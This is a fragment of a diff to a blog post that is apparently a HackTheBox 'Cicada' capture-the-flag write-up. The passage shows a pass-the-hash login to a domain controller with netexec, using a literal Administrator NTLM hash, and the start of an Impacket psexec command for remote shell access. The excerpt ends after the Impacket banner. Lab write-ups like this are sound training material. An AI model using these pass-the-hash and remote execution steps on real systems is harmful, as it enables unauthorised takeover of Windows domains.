ricobandy/ricobandy.github.io/_posts/2025-02-15-Cicada-HTB.md

 [*] Cleaning up...
 ```

-- the hash for Administrator works
+The hash for Administrator works for SMB

 ```
 $ nxc smb 10.129.62.87 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
 SMB         10.129.62.87    445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
 SMB         10.129.62.87    445    CICADA-DC        [+] cicada.htb\Administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
 ```

-- We have access to the root.txt
+-We have access to the root.txt

 ```
 $ psexec.py Administrator@10.129.62.87 -hashes :2b87e7c93a3e8a0ea4a581937016f341
 Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies